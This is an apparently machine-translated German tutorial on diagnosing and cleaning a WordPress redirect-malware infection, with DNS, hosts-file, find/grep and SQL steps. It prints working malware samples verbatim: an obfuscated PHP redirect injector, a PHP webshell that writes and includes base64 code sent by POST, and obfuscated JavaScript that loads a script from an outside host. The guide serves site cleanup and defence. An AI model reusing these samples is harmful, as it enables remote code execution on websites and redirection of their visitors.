WordPress ist definitiv die am häufigsten genutzte Plattform CMS (Content Management System) sowohl für Blogs als auch für Einsteiger-Onlineshops (mit dem WooCommerce-Modul), wodurch es am stärksten von Computerangriffen (Hacking) angegriffen wird. Eine der am häufigsten verwendeten Hacking-Operationen zielt darauf ab, die kompromittierte Website auf andere Webseiten umzuleiten. Redirect WordPress Hack 2023 ist eine relativ neue Malware, die dazu führt, dass die gesamte Website auf Spam-Webseiten umgeleitet wird oder die wiederum die Computer der Benutzer infizieren kann.

Wenn Ihre auf WordPress entwickelte Website auf eine andere Website umgeleitet wird, ist sie höchstwahrscheinlich Opfer des bereits bekannten Weiterleitungs-Hacks.

In diesem Tutorial finden Sie die notwendigen Informationen und nützlichen Tipps, mit denen Sie eine mit einer Weiterleitung infizierte Website von Viren befreien können WordPress Hack (Virus Redirect). Durch die Kommentare können Sie zusätzliche Informationen erhalten oder um Hilfe bitten.

Virenerkennung, die WordPress-Sites umleitet

Ein plötzlicher und ungerechtfertigter Rückgang des Website-Verkehrs, ein Rückgang der Anzahl der Bestellungen (bei Online-Shops) oder der Werbeeinnahmen sind erste Anzeichen dafür, dass etwas nicht stimmt. Erkennung “Redirect WordPress Hack 2023” (Virenumleitung) ist ebenfalls möglich “visuell” wenn Sie die Website öffnen und zu einer anderen Webseite weitergeleitet werden.

Erfahrungsgemäß sind die meisten Web-Malware mit Internetbrowsern kompatibel: Chrome, Firefox, Edge, Opera. Wenn Sie ein Mac-Benutzer sind, sind diese Viren im Safari-Browser nicht sehr sichtbar. Das Sicherheitssystem von Safari blockiert diese schädlichen Skripte stillschweigend.

Was tun, wenn Ihre Website mit Redirect WordPress Hack infiziert ist?

Ich hoffe, dass der erste Schritt nicht darin besteht, in Panik zu geraten oder die Website zu löschen. Auch infizierte oder Virendateien sollten zunächst nicht gelöscht werden. Sie enthalten wertvolle Informationen, die Ihnen helfen können, zu verstehen, wo die Sicherheitslücke liegt und welche Auswirkungen der Virus hat. Modus operandi.

Schließen Sie die Website für die Öffentlichkeit.

Wie schließt man eine Virus-Website für Besucher? Am einfachsten ist es, den DNS-Manager zu verwenden und dessen IP zu löschen “A” (Domänenname) oder definieren Sie eine nicht vorhandene IP dafür. Somit werden Website-Besucher vor diesem WordPress-Redirect-Hack geschützt, der sie auf Viren- oder SPAM-Webseiten führen kann.

Wenn Sie verwenden CloudFlare Als DNS-Manager melden Sie sich bei Ihrem Konto an und löschen DNS-Einträge “A” für den Domainnamen. Somit bleibt die vom Virus betroffene Domäne ohne IP und kann nicht mehr über das Internet aufgerufen werden.

Kopieren Sie die IP der Website und machen Sie es “Route” sodass nur Sie darauf zugreifen können. Von Ihrem Computer aus.

Wie ändert man die echte IP einer Website auf Windows-Computern?

Die Methode wird häufig verwendet, um den Zugriff auf bestimmte Websites durch Bearbeiten der Datei zu blockieren “Gastgeber”.

1. Öffnen Sie Notepad oder einen anderen Texteditor (mit Administratorrechten) und bearbeiten Sie die Datei “hosts“. Es befindet sich in:

C:\Windows\System32\drivers\etc\hosts

2. In der Datei “Gastgeber” hinzufügen “Route” zur tatsächlichen IP Ihrer Website. IP oben vom DNS-Manager gelöscht.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Speichern Sie die Datei und rufen Sie die Website im Browser auf.

Wenn die Website nicht geöffnet wird und Sie in der Datei nichts falsch gemacht haben “Gastgeber”, es handelt sich höchstwahrscheinlich um einen DNS-Cache.

Um den DNS-Cache auf einem Windows-Betriebssystem zu leeren, öffnen Sie die Eingabeaufforderung und führen Sie dort den folgenden Befehl aus:

ipconfig /flushdns

Wie ändert man die echte IP einer Website auf Mac-/MacBook-Computern?

Für Mac-Benutzer ist es etwas einfacher, die tatsächliche IP einer Website zu ändern.

1. Öffnen Sie das Dienstprogramm Terminal.

2. Führen Sie die Befehlszeile aus (zur Ausführung ist ein Systemkennwort erforderlich):

sudo nano /etc/hosts

3. Fügen Sie wie bei Windows-Computern die echte IP der Domäne hinzu.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Speichern Sie die Änderungen. Ctrl+X (y).

Nachdem du es getan hast “Route”, sind Sie die einzige Person, die mit Redirect WordPress Hack auf die infizierte Website zugreifen kann.

Vollständige Backup-Website – Dateien und Datenbank

Auch wenn es infiziert ist “WordPress-Hack umleiten”, empfiehlt es sich, ein generelles Backup der gesamten Website zu erstellen. Dateien und Datenbank. Möglicherweise können Sie auch eine lokale Kopie beider Dateien speichern public / public_html sowie die Datenbank.

Identifizierung der von Viren verwendeten Dateien und der durch Redirect WordPress Hack 2023 geänderten Dateien

Die Hauptzieldateien der WordPress Ich bin index.php (in der Wurzel), header.php, index.php Und footer.php des aktiven WordPress-Themes. Überprüfen Sie diese Dateien manuell und identifizieren Sie bösartigen Code oder ein Malware-Skript.

Im Jahr 2023 ein Virus vom Typ “WordPress-Hack umleiten” einstellen index.php ein Code der Form:

(Ich empfehle nicht, diese Codes auszuführen!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Entschlüsselt, das hier Skript-Malware Es ist im Grunde die Folge einer Infektion der WordPress-Website. Es ist nicht das Skript hinter der Malware, sondern das Skript, das es ermöglicht, die infizierte Webseite umzuleiten. Wenn wir das obige Skript entschlüsseln, erhalten wir:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Um alle Dateien auf dem Server zu identifizieren, die diesen Code enthalten, ist es gut, Zugriff zu haben SSH zum Server, um Dateiprüfungs- und Verwaltungsbefehlszeilen unter Linux auszuführen.

Verwandt: Wie können Sie mit Hilfe der Google -Suche einen Virus -Blog haben oder nicht. (WordPress -Virus)

Nachfolgend finden Sie zwei Befehle, die auf jeden Fall hilfreich sind, um kürzlich geänderte Dateien und Dateien zu identifizieren, die einen bestimmten Code (String) enthalten.

Wie sehen Sie, dass PHP-Dateien in den letzten 24 Stunden oder in einem anderen Zeitraum unter Linux geändert wurden?

Befehl “find” Es ist sehr einfach zu verwenden und ermöglicht die individuelle Einstellung des Zeitraums, des Pfads, in dem die Suche durchgeführt wird, und der Art der Dateien.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

In der Ausgabe erhalten Sie Informationen über Datum und Uhrzeit der Dateiänderung, die Schreib-/Lese-/Ausführungsberechtigungen (chmod) und zu welcher Gruppe/Benutzer es gehört.

Wenn Sie vor mehr Tagen prüfen möchten, ändern Sie den Wert “-mtime -1” oder verwenden “-mmin -360” für Minuten (6 Stunden).

Wie suche ich nach einem Code (String) in PHP- und Java-Dateien?

Befehlszeile “finden” mit dem Sie schnell alle PHP- oder Java-Dateien finden können, die einen bestimmten Code enthalten, lautet wie folgt:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Der Befehl sucht nach den Dateien und zeigt sie an .php Und .js die enthalten “uJjBRODYsU“.

Mithilfe der beiden oben genannten Befehle können Sie ganz einfach herausfinden, welche Dateien kürzlich geändert wurden und welche Malware-Code enthalten.

Entfernt Schadcode aus geänderten Dateien, ohne den korrekten Code zu gefährden. In meinem Szenario wurde die Malware vor dem Öffnen platziert <head>.

Beim Ausführen des ersten Befehls “finden” Es ist durchaus möglich, dass Sie auf dem Server auch neue Dateien entdecken, die nicht von WordPress stammen und nicht von Ihnen dort abgelegt wurden. Dateien, die zum Redirect WordPress Hack-Virus gehören.

In dem von mir untersuchten Szenario wurden Shapefiles auf dem Server angezeigt “wp-log-nOXdgD.php“. Das sind Dateien “Generation” die auch Malware-Code enthalten, der vom Redirect-Virus verwendet wird.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Der Zweck von Typdateien “wp-log-*” besteht darin, den Redirect-Hack-Virus auf andere auf dem Server gehostete Websites zu verbreiten. Es handelt sich um eine Art Malware-Code “webshell” bestehend aus a Grundabschnitt (in dem einige verschlüsselte Variablen definiert sind) und o Ausführungsabschnitt über die der Angreifer versucht, einen Schadcode auf das System zu laden und auszuführen.

Wenn es eine Variable gibt POST namens ‘bh‘ und sein verschlüsselter Wert MD5 ist gleich “8f1f964a4b4d8d1ac3f0386693d28d03“, dann scheint das Skript den verschlüsselten Inhalt zu schreiben base64 einer anderen benannten Variablen ‘b3‘ in einer temporären Datei und versucht dann, diese temporäre Datei einzubinden.

Wenn es eine Variable gibt POST oder GET namens ‘tick', das Skript antwortet mit dem Wert MD5 der Saite “885“.

Um alle Dateien auf dem Server zu identifizieren, die diesen Code enthalten, wählen Sie eine gemeinsame Zeichenfolge aus und führen Sie dann den Befehl de aus “find” (ähnlich wie oben). Löschen Sie alle Dateien, die diesen Malware-Code enthalten.

Sicherheitslücke durch Redirect-WordPress-Hack ausgenutzt

Höchstwahrscheinlich gelangt dieser Redirect-Virus über Ausnutzung des WordPress-Administratorbenutzers oder durch die Identifizierung von a anfälliges Plugin Dies ermöglicht das Hinzufügen von Benutzern mit Administratorrechten.

Für die meisten Websites, die auf der WordPress-Plattform erstellt wurden, ist dies möglich Bearbeiten von Theme- oder Plugin-Dateienüber die Administrationsoberfläche (Dashboard). Somit kann eine böswillige Person Malware-Code zu den Theme-Dateien hinzufügen, um die oben gezeigten Skripte zu generieren.

Ein Beispiel für einen solchen Malware-Code ist dieser:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript unmittelbar nach dem Öffnen des Tags im WordPress-Theme-Header identifiziert <head>.

Es ist ziemlich schwierig, dieses JavaScript zu entschlüsseln, aber es ist offensichtlich, dass es eine andere Webadresse abfragt, von der es höchstwahrscheinlich andere Skripte zum Erstellen der Dateien abruft “wp-log-*” worüber wir oben gesprochen haben.

Suchen und löschen Sie diesen Code aus allen Dateien PHP betroffen.

Soweit ich das beurteilen konnte, war dieser Code manuell hinzugefügt durch einen neuen Benutzer mit Administratorrechten.

Um das Hinzufügen von Malware-Code aus dem Dashboard zu verhindern, ist es daher am besten, die Option zum Bearbeiten von WordPress-Themes/Plugins über das Dashboard zu deaktivieren.

Bearbeiten Sie die Datei wp-config.php und füge die Zeilen hinzu:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Nachdem Sie diese Änderung vorgenommen haben, kann kein WordPress-Benutzer mehr Dateien über das Dashboard bearbeiten.

Überprüfen Sie Benutzer mit Administratorrolle

Nachfolgend finden Sie eine SQL-Abfrage, mit der Sie nach Administratorbenutzern auf der WordPress-Plattform suchen können:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Diese Abfrage gibt alle Benutzer in der Tabelle zurück wp_users wer die Administratorrolle zugewiesen hat. Die Abfrage erfolgt auch für die Tabelle wp_usermeta um das Meta zu durchsuchen ‘wp_capabilities', das Informationen über Benutzerrollen enthält.

Eine andere Methode besteht darin, sie anhand von Folgendem zu identifizieren: Dashboard → Users → All Users → Administrator. Es gibt jedoch Vorgehensweisen, mit denen ein Benutzer im Dashboard-Bereich ausgeblendet werden kann. Also der beste Weg, Benutzer zu sehen “Administrator” von WordPress ist der obige SQL-Befehl.

In meinem Fall habe ich den Benutzer anhand seines Namens in der Datenbank identifiziert “wp-import-user“. Ziemlich suggestiv.

Außerdem können Sie hier Datum und Uhrzeit der Erstellung des WordPress-Benutzers sehen. Auch die Benutzer-ID ist sehr wichtig, da sie die Serverprotokolle durchsucht. Auf diese Weise können Sie alle Aktivitäten dieses Benutzers sehen.

Benutzer mit Administratorrolle löschen was du also nicht weißt Passwörter ändern an alle administrativen Benutzer. Herausgeber, Autor, Administrator.

Ändern Sie das Passwort des SQL-Datenbankbenutzers der betroffenen Website.

Nach Durchführung dieser Schritte kann die Website für alle Benutzer neu gestartet werden.

Bedenken Sie jedoch, dass das, was ich oben dargestellt habe, eines von vielleicht Tausenden von Szenarien ist, in denen eine Website im Jahr 2023 mit Redirect WordPress Hack infiziert wird.

Wenn Ihre Website infiziert wurde und Sie Hilfe benötigen oder Fragen haben, steht Ihnen der Kommentarbereich zur Verfügung.